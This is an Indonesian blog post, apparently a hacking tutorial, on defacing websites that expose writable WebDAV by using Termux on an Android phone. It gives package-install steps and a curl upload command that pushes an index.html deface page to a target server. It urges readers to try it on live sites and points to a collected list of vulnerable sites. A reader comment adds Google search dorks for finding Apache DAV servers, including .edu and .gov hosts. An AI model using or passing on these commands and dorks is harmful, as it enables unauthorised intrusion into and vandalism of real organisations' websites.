Breaking

Tutorial Cara Deface Webdav di Termux Android Lengkap


Hell World .Kali Ini Gua Bakalan Share Tutorial Deface Webdav Versi Termux nih Karena Sekarang Teknologi Semakin Berkembang Banyak Developer Developer Aplikasi Untuk Menciptakan Aplikasi Yang Ada di PC Untuk Pengguna Smartphone Contohnya Termux.

Termuxadalah Android Terminal Emulator yang juga menyediakan Linux Environment.Ya Jadi Termux ini Seperti Terminal Kalo di PC tapi ini versi Android nya, Sama Juga Webdav Ya kan Webdav Adalah Sebuah Aplikasi Buatan Hmei7 salah satu Legendaris Deface Yang Katanya Orang indonesia loh Hebat Ye .

Namun Keberadaannya Sangat Misterius hehe Kayak Hantu Yak ,Webdav di ciptakan untuk pengguna Pc nah loh yang ga punya pc bingung dah pen nyoba padahal ,Tapi Tenang Sekarang bisa loh nyobain Webdav Namun Versi Termux Hehehe Oke Buat Kalian Yang Punya Android 5 di bawah kudu sabar ya .

karena termux ini berjalan di Android 5+ jadi sabar bat dah ,nah Kalian buat yang Belum Tahu Termux ini Berjalan tanpa Root ,Jadi Jan salah paham Ya ,Ntar Malah Hp nya di root lagi ,padahal kan ga perlu hehehe udah ah cape langsung aja ke Tutor nya :)

Siapken sesajen seperti biasa
1.TERMUX  Disini
2.Script Deface Disini
3.Kopi Kopi lah 
Oke Jika Semua Sesajen siap ,Pertama Tama Kita buka Aplikasi Termux Nya ,Jangan Lupa Untuk Pengaturan Penyimpanan Termux nya di Acc Yak , Kalo Gak Ntar Ada Tulisan Permission denied ,Oke Jika Sudah Kalian Ketikan Kode Berikut ini


$pkg update (lalu enter)
$pkg upgrade(lalu enter)
$pkg install curl(lalu enter)

Contoh nya seperti ini 


Nah Jika Ada Tulisan [ Y /N ] ketik Saja Y lalu Tekan Enter jika Sudah Lalu tinggal install pkg selanjutnya 


Nah Jika Sudah Done Semua Tinggal pkg selanjutnya Lagi Ya 


Nah Semua pkg udah Ke install lalu tinggal apalagi boss tinggal depes deh caranya gimana ?, caranya ketikan seperti ini c

$curl -T /storage/emulated/0/index.html http://webtarget.com [enter ]

Nah gitu caranya oh iya [0] itu nama internal storage saya jadi silahkan di ganti dengan nama internal hp anda ,dan untuk nama sc nya lebih baik index.html kenapa ? Karena saat di miror bsa dapet HOME deface gtulah kurang lebih ,mau di contohin ? Oke lah 


Nah disitu Gw Udh Coba Noh Salah Satu Target Nah jika Vuln Webnya / bsa kita depes nih muncul lagi [ $ ] Tapi Jika Muncul Tulisan Eror / banyak bat kek gtu tulisan bla bla bla bla berarti gak bsa di depes .

Nah Gampang Banget kan Buat depes pake webdav ini untuk live demo nya Disini Setiap site bsa di deface  siapa saja kalo vuln jadi kalo hasil deface saya udah berubah berarti udah di deface lagi sama orang .

silahkan boleh boleh aja kok buat percobaan heheh oh iya bonus nih buat kalian yang baru depes bisa lihat site vuln yang udah gw kumpulin kurang lebih ratusan hehe pandai pandai memilih yak ,siapa cepat dia dapat haha  LIHAT DISINI

3 comments:

  1. Bang minta Dork Nya Ygbaru

    Pleaee Respon Bang Pliss

    ReplyDelete
    Replies
    1. intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache”
      intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:edu
      intitle:”index.of” intext:”(Win32) DAV/2″ intext:”Apache” site:gov
      intitle:”index.of” intext:”(Win32) DAV/2″

      kembangin lagi

      Delete

Profil

My photo
Suka anime, manga, novel, tapi bukan wibu.

Translate

Powered by Blogger.